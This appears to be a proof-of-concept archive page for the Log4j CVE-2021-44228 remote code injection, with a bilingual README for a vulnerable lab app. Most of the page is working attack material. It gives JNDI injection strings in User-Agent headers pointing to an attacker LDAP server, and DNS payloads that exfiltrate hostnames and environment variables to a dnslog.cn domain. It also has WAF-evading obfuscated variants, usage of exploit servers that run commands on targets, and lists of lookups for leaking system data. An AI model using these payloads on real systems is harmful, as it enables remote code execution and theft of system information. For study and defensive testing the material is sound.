Associated Vulnerability
Title:Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints (CVE-2021-44228)Description:Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
Description
Remote Code Injection In Log4j
Readme
# CVE-2021-44228 Remote Code Injection In Log4j
https://twitter.com/jas502n/status/1468946197629272066
### SpringBoot-pom.xml
default use :
``` xml
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-web</artifactId>
</dependency>
```
**mvn dependency:tree**
```java
[INFO] | | +- org.springframework.boot:spring-boot-starter-logging:jar:2.6.1:compile
[INFO] | | | +- ch.qos.logback:logback-classic:jar:1.2.7:compile
[INFO] | | | | \- ch.qos.logback:logback-core:jar:1.2.7:compile
[INFO] | | | +- org.apache.logging.log4j:log4j-to-slf4j:jar:2.14.1:compile
[INFO] | | | \- org.slf4j:jul-to-slf4j:jar:1.7.32:compile
[INFO] | | \- org.slf4j:slf4j-api:jar:1.7.32:compile
```
change pom.xml
```xml
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-web</artifactId>
<exclusions>
<exclusion>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-logging</artifactId>
</exclusion>
</exclusions>
</dependency>
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-core</artifactId>
<version>2.14.1</version>
</dependency>
```
## 漏洞环境使用
usage:
```
$ java -jar log4jRCE-0.0.1-SNAPSHOT.jar
[*] CVE-2021-44228 Log4j2 Remote Code Injection
. ____ _ __ _ _
/\\ / ___'_ __ _ _(_)_ __ __ _ \ \ \ \
( ( )\___ | '_ | '_| | '_ \/ _` | \ \ \ \
\\/ ___)| |_)| | | | | || (_| | ) ) ) )
' |____| .__|_| |_|_| |_\__, | / / / /
=========|_|==============|___/=/_/_/_/
:: Spring Boot :: (v2.6.1)
2021-12-10 16:18:43.099 WARN 48536 --- [ main] o.s.boot.StartupInfoLogger : InetAddress.getLocalHost().getHostName() took 5005 milliseconds to respond. Please verify your network configuration (macOS machines may need to add entries to /etc/hosts).
2021-12-10 16:18:48.108 INFO 48536 --- [ main] c.example.log4jrce.Log4jRceApplication : Starting Log4jRceApplication v0.0.1-SNAPSHOT using Java 1.8.0_60 on JMacBookPro.local with PID 48536 (/Users/jas502n/IdeaProjects/log4jRCE/target/log4jRCE-0.0.1-SNAPSHOT.jar started by root in log4jRCE/target)
2021-12-10 16:18:48.109 INFO 48536 --- [ main] c.example.log4jrce.Log4jRceApplication : No active profile set, falling back to default profiles: default
2021-12-10 16:18:48.890 INFO 48536 --- [ main] o.s.b.w.embedded.tomcat.TomcatWebServer : Tomcat initialized with port(s): 8080 (http)
2021-12-10 16:18:48.902 INFO 48536 --- [ main] o.apache.catalina.core.StandardService : Starting service [Tomcat]
2021-12-10 16:18:48.902 INFO 48536 --- [ main] org.apache.catalina.core.StandardEngine : Starting Servlet engine: [Apache Tomcat/9.0.55]
2021-12-10 16:18:48.957 INFO 48536 --- [ main] o.a.c.c.C.[Tomcat].[localhost].[/] : Initializing Spring embedded WebApplicationContext
```
#### Burpsuite Send
```
POST /login HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 52
data=xxxxx
```
```
HTTP/1.1 200
Content-Type: text/html;charset=UTF-8
Content-Length: 15
Date: Fri, 10 Dec 2021 08:38:50 GMT
Connection: close
log4j2 success!
```
#### User-Agent Injection
```bash
GET / HTTP/1.1
Host: 192.168.3.105:18080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)${jndi:ldap://192.168.3.105:1389/o=reference} AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://192.168.3.105:18080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
HTTP/1.1 200
Content-Type: image/avif;charset=UTF-8
Content-Length: 26
Date: Tue, 14 Dec 2021 13:08:14 GMT
Connection: close
User-Agent Inject Success!
```
Example: JDK jdk8-202
```java
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)${jndi:ldap://192.168.3.105:1389/o=tomcat} AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
2021-12-14 21:18:08.810 INFO 50619 --- [io-18080-exec-2] c.e.l.Log4jRceApplication : >>> Mozilla/5.0 (Windows NT 10.0; Win64; x64)javax.el.ELProcessor@7d97214f AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)${jndi:ldap://192.168.3.105:1389/o=groovy} AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
2021-12-14 21:19:34.516 INFO 50619 --- [io-18080-exec-3] c.e.l.Log4jRceApplication : >>> Mozilla/5.0 (Windows NT 10.0; Win64; x64)groovy.lang.GroovyShell@383ad44e AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
```
### Fix log4j2 Tips By Default Properites
默认 Map 预先填充了 **hostName** 的值,该值是当前系统的主机名或IP地址,
参考文档:https://www.docs4dev.com/docs/zh/log4j2/2.x/all/manual-configuration.html
`org.apache.logging.log4j.core.LoggerContext#setConfiguration`
```
${hostName}
${env:COMPUTERNAME}
${env:USERDOMAIN}
${env:LOGONSERVER}
```
Example:
```
// log4j2 Default,For(Windows、Linux、macOS....)
${jndi:dns://${hostName}.iwk5r1.dnslog.cn}
// Equivalent to windows command(set|findstr your-hostname)
${jndi:dns://${env:COMPUTERNAME}.iwk5r1.dnslog.cn}
${jndi:dns://${env:USERDOMAIN}.iwk5r1.dnslog.cn}
```
### log4j for configLocation
log4j: Log4j 配置属性。
表达式 `${log4j:configLocation}` 和 `${log4j:configParentLocation}` 分别提供了 `log4j 配置文件` 及其`父文件夹`的`绝对路径`。
```
${log4j:configLocation}
/xxx/apache-tomcat/webapps/xxxx/WEB-INF/classes/log4j2.xml
```
```
${log4j:configParentLocation}
/xxx/apache-tomcat/webapps/xxxx/WEB-INF/classes/
```
### JNDIExploit-Tools
01-feihong-cs/JNDIExploit
https://github.com/feihong-cs/JNDIExploit
usage:
```java
$ java -jar JNDIExploit-1.2-SNAPSHOT.jar -i vps_ip -p 8082
[+] LDAP Server Start Listening on 1389...
[+] HTTP Server Start Listening on 8082...
```
02-welk1n/JNDI-Injection-Exploit
https://github.com/welk1n/JNDI-Injection-Exploit
usage:
```java
$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "open -a calculator" -A vip_ip
[ADDRESS] >> vip_ip
[COMMAND] >> open -a calculator
----------------------------JNDI Links----------------------------
Target environment(Build in JDK 1.7 whose trustURLCodebase is true):
rmi://vip_ip:1099/x6sufy
ldap://vip_ip:1389/x6sufy
Target environment(Build in JDK whose trustURLCodebase is false and have Tomcat 8+ or SpringBoot 1.2.x+ in classpath):
rmi://vip_ip:1099/gh4u9h
Target environment(Build in JDK 1.8 whose trustURLCodebase is true):
rmi://vip_ip:1099/kwoimv
ldap://vip_ip:1389/kwoimv
```
03-veracode-research/rogue-jndi
https://github.com/veracode-research/rogue-jndi
usage:
```java
$ java -jar target/RogueJndi-1.1.jar --command "calc" --hostname "vip_ip"
+-+-+-+-+-+-+-+-+-+
|R|o|g|u|e|J|n|d|i|
+-+-+-+-+-+-+-+-+-+
Starting HTTP server on 0.0.0.0:8000
Starting LDAP server on 0.0.0.0:1389
Mapping ldap://vip_ip:1389/ to artsploit.controllers.RemoteReference
Mapping ldap://vip_ip:1389/o=reference to artsploit.controllers.RemoteReference
Mapping ldap://vip_ip:1389/o=tomcat to artsploit.controllers.Tomcat
Mapping ldap://vip_ip:1389/o=groovy to artsploit.controllers.Groovy
Mapping ldap://vip_ip:1389/o=websphere1 to artsploit.controllers.WebSphere1
Mapping ldap://vip_ip:1389/o=websphere1,wsdl=* to artsploit.controllers.WebSphere1
Mapping ldap://vip_ip:1389/o=websphere2 to artsploit.controllers.WebSphere2
Mapping ldap://vip_ip:1389/o=websphere2,jar=* to artsploit.controllers.WebSphere2
```
04-welk1n/JNDI-Injection-Bypass
https://github.com/welk1n/JNDI-Injection-Bypass
usage:
```bash
$ java -cp JNDI-Injection-Bypass-1.0-SNAPSHOT-all.jar payloads.EvilRMIServer vip_ip
Creating evil RMI registry on port 1097
```
```xml
// Expression Language 3.0.0 API-Apr, 2013
<!-- https://mvnrepository.com/artifact/javax.el/javax.el-api -->
<dependency>
<groupId>javax.el</groupId>
<artifactId>javax.el-api</artifactId>
<version>3.0.0</version>
</dependency>
// Apache Groovy 3.0.0: A powerful, dynamic language for the JVM
<!-- https://mvnrepository.com/artifact/org.codehaus.groovy/groovy -->
<dependency>
<groupId>org.codehaus.groovy</groupId>
<artifactId>groovy</artifactId>
<version>3.0.0</version>
</dependency>
```
#### USE ${lower:xxx} or ${upper:xxx} or {::-n} Bypass Waf
use `"ı".toUpperCase()` bypass I >>> `JNDI` >> `${JND${upper:ı}`
https://www.leavesongs.com/HTML/javascript-up-low-ercase-tip.html
other:
```
[>] jndi inject model start...
[+] Raw payload:
${jndi:dns://${hostName}.b2hp8r.dnslog.cn}
[+] {[upper|lower]:x} Random obfuscate:
${${upper:j}nd${lower:i}:${lower:d}${lower:n}s://${h${lower:o}st${upper:N}ame}.b2${lower:h}p8r.${lower:d}nsl${lower:o}${lower:g}${lower:.}cn}
${${upper:j}nd${lower:i}:${lower:d}${lower:n}s://${h${lower:o}st${upper:n}ame}.b2${lower:h}p8r.${lower:d}nsl${lower:o}${lower:g}${lower:.}cn}
[+] {[upper|lower]:x} all the obfuscate:
${${upper:j}${lower:n}${lower:d}${lower:i}${lower::}${lower:d}${lower:n}${lower:s}${lower::}${lower:/}${lower:/}${${lower:h}${lower:o}${lower:s}${lower:t}${upper:N}${lower:a}${lower:m}${lower:e}}${lower:.}${lower:b}${lower:2}${lower:h}${lower:p}${lower:8}${lower:r}${lower:.}${lower:d}${lower:n}${lower:s}${lower:l}${lower:o}${lower:g}${lower:.}${lower:c}${lower:n}}
${${upper:j}${lower:n}${lower:d}${lower:i}${lower::}${lower:d}${lower:n}${lower:s}${lower::}${lower:/}${lower:/}${${lower:h}${lower:o}${lower:s}${lower:t}${upper:n}${lower:a}${lower:m}${lower:e}}${lower:.}${lower:b}${lower:2}${lower:h}${lower:p}${lower:8}${lower:r}${lower:.}${lower:d}${lower:n}${lower:s}${lower:l}${lower:o}${lower:g}${lower:.}${lower:c}${lower:n}}
[+] {::-n} random obfuscate:
${j${zG:xuc:-n}d${wXuN:-i}:dns:/${emWDv:Jdq:-/}${${RfdM:txf:-h}o${O:atnIDv:-s}${O:YM:sdm:fP:DPYEXx:-t}${fiShn:P:NA:-N}${v:h:rLVoL:-a}me}.b2${Ld:Tnzo:-h}p${cCC:-8}r${aoq:FF:-.}dnslog.${GL:-c}n}
[+] {::-n} all the obfuscate:
${${ogEqGS:RDg:fUxz:-j}${ldB:E:N:PG:-n}${VzvPou:-d}${lr:oRfT:-i}${nw:-:}${j:-d}${EcFIy:YQUG:zKWwP:jNq:DjGp:-n}${sjydOt:S:eCS:QQ:xRDd:-s}${nLj:F:TptB:-:}${WqfK:rWy:YVXz:-/}${jyvggg:wrwT:hp:-/}${${Pw:-h}${R:-o}${Y:bhV:-s}${sNr:Oiv:RBRrv:ISrLbB:rCBSw:-t}${h:JeAg:-N}${Se:L:dxEa:Ssx:-a}${HYtfSz:AInf:gHTSJ:LkD:Wxqq:-m}${uxdytq:-e}}${EBxUv:wf:UmUc:dIDP:-.}${k:x:Fq:muQmwT:-b}${XioYP:Qc:-2}${Gnr:NY:-h}${YhRuP:tIAVJ:W:-p}${veLxt:pVKX:MPGdO:lNo:LXWtN:-8}${NqPAoG:lhEirn:QhJOS:QIMJ:-r}${wx:-.}${H:wA:UTu:s:TwBzM:-d}${VGlR:CXlxMV:PSJ:-n}${b:wMDG:wn:PjYam:-s}${Nmdg:y:sNnW:-l}${rF:GRmC:-o}${RkV:QRb:-g}${LDBWIn:dMxv:-.}${pNgiK:az:arNf:-c}${OgV:XPTn:-n}}
[=] jndi inject model stop
```
https://github.com/woodpecker-appstore/log4j-payload-generator
#### log4j-::
Example:
```
${::-n}
2021-12-14 11:08:49.287 ERROR 31355 --- [io-18080-exec-4] c.e.l.Log4jRceApplication : >>> n
${xxx::-n}
2021-12-14 11:07:24.785 ERROR 31355 --- [io-18080-exec-1] c.e.l.Log4jRceApplication : >>> n
${:xxx:-n}
2021-12-14 11:08:18.012 ERROR 31355 --- [io-18080-exec-3] c.e.l.Log4jRceApplication : >>> n
${:-n}
2021-12-14 11:11:10.135 ERROR 31355 --- [io-18080-exec-3] c.e.l.Log4jRceApplication : >>> n
${:-jndi}
2021-12-14 11:10:43.420 ERROR 31355 --- [io-18080-exec-1] c.e.l.Log4jRceApplication : >>> jndi
```
#### log4j-lower
```java
this.strLookupMap.put("lower", new LowerLookup());
```
**org.apache.logging.log4j.core.lookup.LowerLookup#lookup(org.apache.logging.log4j.core.LogEvent, java.lang.String)**
```java
package org.apache.logging.log4j.core.lookup;
import org.apache.logging.log4j.core.LogEvent;
import org.apache.logging.log4j.core.config.plugins.Plugin;
@Plugin(
name = "lower",
category = "Lookup"
)
public class LowerLookup implements StrLookup {
public LowerLookup() {
}
public String lookup(final String key) {
return key != null ? key.toLowerCase() : null; // toLowerCase()
}
public String lookup(final LogEvent event, final String key) {
return this.lookup(key);
}
}
```
Example:
```java
data=${lower:JNDI}
2021-12-14 10:05:12.051 ERROR 31355 --- [io-18080-exec-6] c.e.l.Log4jRceApplication : >>> jndi
```
#### log4j-upper
```java
this.strLookupMap.put("upper", new UpperLookup());
```
**org.apache.logging.log4j.core.lookup.UpperLookup#lookup(org.apache.logging.log4j.core.LogEvent, java.lang.String)**
```java
package org.apache.logging.log4j.core.lookup;
import org.apache.logging.log4j.core.LogEvent;
import org.apache.logging.log4j.core.config.plugins.Plugin;
@Plugin(
name = "upper",
category = "Lookup"
)
public class UpperLookup implements StrLookup {
public UpperLookup() {
}
public String lookup(final String key) {
return key != null ? key.toUpperCase() : null;
}
public String lookup(final LogEvent event, final String key) {
return this.lookup(key);
}
}
```
Example:
```java
data=${upper:jndi}
2021-12-14 10:08:29.286 ERROR 31355 --- [io-18080-exec-8] c.e.l.Log4jRceApplication : >>> JNDI
```
#### log4j-java
| ID | usage | method |
| ---- | ----- | ------ |
|1|${java:version}|getSystemProperty("java.version")|
|2|${java:runtime}|getRuntime()|
|3|${java:vm}|getVirtualMachine()|
|4|${java:os}|getOperatingSystem()|
|5|${java:hw}|getHardware()|
|6|${java:locale}|getLocale()|
**org.apache.logging.log4j.core.lookup.JavaLookup**
```java
public String getHardware() {
return "processors: " + Runtime.getRuntime().availableProcessors() + ", architecture: " + this.getSystemProperty("os.arch") + this.getSystemProperty("-", "sun.arch.data.model") + this.getSystemProperty(", instruction sets: ", "sun.cpu.isalist");
}
public String getLocale() {
return "default locale: " + Locale.getDefault() + ", platform encoding: " + this.getSystemProperty("file.encoding");
}
public String getOperatingSystem() {
return this.getSystemProperty("os.name") + " " + this.getSystemProperty("os.version") + this.getSystemProperty(" ", "sun.os.patch.level") + ", architecture: " + this.getSystemProperty("os.arch") + this.getSystemProperty("-", "sun.arch.data.model");
}
public String getRuntime() {
return this.getSystemProperty("java.runtime.name") + " (build " + this.getSystemProperty("java.runtime.version") + ") from " + this.getSystemProperty("java.vendor");
}
private String getSystemProperty(final String name) {
return this.spLookup.lookup(name);
}
public String getVirtualMachine() {
return this.getSystemProperty("java.vm.name") + " (build " + this.getSystemProperty("java.vm.version") + ", " + this.getSystemProperty("java.vm.info") + ")";
}
```
##### log4j2-env
###### Linux:
```properties
CLASSPATH,HOME,JAVA_HOME,LANG,LC_TERMINAL,LC_TERMINAL_VERSION,LESS,LOGNAME,LSCOLORS,LS_COLORS,MAIL,NLSPATH,OLDPWD,PAGER,PATH,PWD,SHELL,SHLVL,SSH_CLIENT,SSH_CONNECTION,SSH_TTY,TERM,USER,XDG_RUNTIME_DIR,XDG_SESSION_ID,XFILESEARCHPATH,ZSH,_
```
| id | usage |
| ---- | ----- |
|1|${env:CLASSPATH}|
|2|${env:HOME}|
|3|${env:JAVA_HOME}|
|4|${env:LANG}|
|5|${env:LC_TERMINAL}|
|6|${env:LC_TERMINAL_VERSION}|
|7|${env:LESS}|
|8|${env:LOGNAME}|
|9|${env:LSCOLORS}|
|10|${env:LS_COLORS}|
|11|${env:MAIL}|
|12|${env:NLSPATH}|
|13|${env:OLDPWD}|
|14|${env:PAGER}|
|15|${env:PATH}|
|16|${env:PWD}|
|17|${env:SHELL}|
|18|${env:SHLVL}|
|19|${env:SSH_CLIENT}|
|20|${env:SSH_CONNECTION}|
|21|${env:SSH_TTY}|
|22|${env:TERM}|
|23|${env:USER}|
|24|${env:XDG_RUNTIME_DIR}|
|25|${env:XDG_SESSION_ID}|
|26|${env:XFILESEARCHPATH}|
|27|${env:ZSH}|
###### Windows:
```properties
=E:,=ExitCode,A8_HOME,A8_ROOT_BIN,ALLUSERSPROFILE,APPDATA,CATALINA_BASE,CATALINA_HOME,CATALINA_OPTS,CATALINA_TMPDIR,CLASSPATH,CLIENTNAME,COMPUTERNAME,ComSpec,CommonProgramFiles,CommonProgramFiles(x86),CommonProgramW6432,FP_NO_HOST_CHECK,HOMEDRIVE,HOMEPATH,JRE_HOME,Java_Home,LOCALAPPDATA,LOGONSERVER,NUMBER_OF_PROCESSORS,OS,PATHEXT,PROCESSOR_ARCHITECTURE,PROCESSOR_IDENTIFIER,PROCESSOR_LEVEL,PROCESSOR_REVISION,PROMPT,PSModulePath,PUBLIC,Path,ProgramData,ProgramFiles,ProgramFiles(x86),ProgramW6432,SESSIONNAME,SystemDrive,SystemRoot,TEMP,TMP,ThisExitCode,USERDOMAIN,USERNAME,USERPROFILE,WORK_PATH,windir,windows_tracing_flags,windows_tracing_logfile
```
| id | usage |
| ---- | ----- |
|1|${env:A8_HOME}|
|2|${env:A8_ROOT_BIN}|
|3|${env:ALLUSERSPROFILE}|
|4|${env:APPDATA}|
|5|${env:CATALINA_BASE}|
|6|${env:CATALINA_HOME}|
|7|${env:CATALINA_OPTS}|
|8|${env:CATALINA_TMPDIR}|
|9|${env:CLASSPATH}|
|10|${env:CLIENTNAME}|
|11|${env:COMPUTERNAME}|
|12|${env:ComSpec}|
|13|${env:CommonProgramFiles}|
|14|${env:CommonProgramFiles(x86)}|
|15|${env:CommonProgramW6432}|
|16|${env:FP_NO_HOST_CHECK}|
|17|${env:HOMEDRIVE}|
|18|${env:HOMEPATH}|
|19|${env:JRE_HOME}|
|20|${env:Java_Home}|
|21|${env:LOCALAPPDATA}|
|22|${env:LOGONSERVER}|
|23|${env:NUMBER_OF_PROCESSORS}|
|24|${env:OS}|
|25|${env:PATHEXT}|
|26|${env:PROCESSOR_ARCHITECTURE}|
|27|${env:PROCESSOR_IDENTIFIER}|
|28|${env:PROCESSOR_LEVEL}|
|29|${env:PROCESSOR_REVISION}|
|30|${env:PROMPT}|
|31|${env:PSModulePath}|
|32|${env:PUBLIC}|
|33|${env:Path}|
|34|${env:ProgramData}|
|35|${env:ProgramFiles}|
|36|${env:ProgramFiles(x86)}|
|37|${env:ProgramW6432}|
|38|${env:SESSIONNAME}|
|39|${env:SystemDrive}|
|40|${env:SystemRoot}|
|41|${env:TEMP}|
|42|${env:TMP}|
|43|${env:ThisExitCode}|
|44|${env:USERDOMAIN}|
|45|${env:USERNAME}|
|46|${env:USERPROFILE}|
|47|${env:WORK_PATH}|
|48|${env:windir}|
|49|${env:windows_tracing_flags}|
|50|${env:windows_tracing_logfile}|
###### Mac:
```properties
ANT_HOME,COMMAND_MODE,GOBIN,GOPATH,GOROOT,GRADLE_HOME,HOME,HOMEBREW_BOTTLE_DOMAIN,JAVA_HOME,JAVA_MAIN_CLASS_3651,LC_CTYPE,LESS,LOGNAME,LSCOLORS,LaunchInstanceID,OLDPWD,PAGER,PATH,PWD,SECURITYSESSIONID,SHELL,SSH_AUTH_SOCK,TIME_STYLE,TMPDIR,USER,VERSIONER_PYTHON_VERSION,XPC_FLAGS,XPC_SERVICE_NAME,ZSH,__CF_USER_TEXT_ENCODING
```
| id | usage |
| ---- | ----- |
|1|${env:ANT_HOME}|
|2|${env:COMMAND_MODE}|
|3|${env:GOBIN}|
|4|${env:GOPATH}|
|5|${env:GOROOT}|
|6|${env:GRADLE_HOME}|
|7|${env:HOME}|
|8|${env:HOMEBREW_BOTTLE_DOMAIN}|
|9|${env:JAVA_HOME}|
|10|${env:JAVA_MAIN_CLASS_3651}|
|11|${env:LC_CTYPE}|
|12|${env:LESS}|
|13|${env:LOGNAME}|
|14|${env:LSCOLORS}|
|15|${env:LaunchInstanceID}|
|16|${env:OLDPWD}|
|17|${env:PAGER}|
|18|${env:PATH}|
|19|${env:PWD}|
|20|${env:SECURITYSESSIONID}|
|21|${env:SHELL}|
|22|${env:SSH_AUTH_SOCK}|
|23|${env:TIME_STYLE}|
|24|${env:TMPDIR}|
|25|${env:USER}|
|26|${env:VERSIONER_PYTHON_VERSION}|
|27|${env:XPC_FLAGS}|
|28|${env:XPC_SERVICE_NAME}|
|29|${env:ZSH}|
##### log4j2-sys
| id | usage |
| ---- | ----- |
|1|${sys:awt.toolkit}|
|2|${sys:file.encoding}|
|3|${sys:file.encoding.pkg}|
|4|${sys:file.separator}|
|5|${sys:java.awt.graphicsenv}|
|6|${sys:java.awt.printerjob}|
|7|${sys:java.class.path}|
|8|${sys:java.class.version}|
|9|${sys:java.endorsed.dirs}|
|10|${sys:java.ext.dirs}|
|11|${sys:java.home}|
|12|${sys:java.io.tmpdir}|
|13|${sys:java.library.path}|
|14|${sys:java.runtime.name}|
|15|${sys:java.runtime.version}|
|16|${sys:java.specification.name}|
|17|${sys:java.specification.vendor}|
|18|${sys:java.specification.version}|
|19|${sys:java.vendor}|
|20|${sys:java.vendor.url}|
|21|${sys:java.vendor.url.bug}|
|22|${sys:java.version}|
|23|${sys:java.vm.info}|
|24|${sys:java.vm.name}|
|25|${sys:java.vm.specification.name}|
|26|${sys:java.vm.specification.vendor}|
|27|${sys:java.vm.specification.version}|
|28|${sys:java.vm.vendor}|
|29|${sys:java.vm.version}|
|30|${sys:line.separator}|
|31|${sys:os.arch}|
|32|${sys:os.name}|
|33|${sys:os.version}|
|34|${sys:path.separator}|
|35|${sys:sun.arch.data.model}|
|36|${sys:sun.boot.class.path}|
|37|${sys:sun.boot.library.path}|
|38|${sys:sun.cpu.endian}|
|39|${sys:sun.cpu.isalist}|
|40|${sys:sun.desktop}|
|41|${sys:sun.io.unicode.encoding}|
|42|${sys:sun.java.command}|
|43|${sys:sun.java.launcher}|
|44|${sys:sun.jnu.encoding}|
|45|${sys:sun.management.compiler}|
|46|${sys:sun.os.patch.level}|
|47|${sys:sun.stderr.encoding}|
|48|${sys:user.country}|
|49|${sys:user.dir}|
|50|${sys:user.home}|
|51|${sys:user.language}|
|52|${sys:user.name}|
|53|${sys:user.script}|
|54|${sys:user.timezone}|
|55|${sys:user.variant}|
File Snapshot
[4.0K] /data/pocs/6d3c4e1f41247418d094eed584b50a4ac7d55c8e
├── [ 25M] log4jRCE-0.0.1-SNAPSHOT.jar
└── [ 22K] README.md
0 directories, 2 files
Remarks
1. It is advised to access via the original source first.
2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →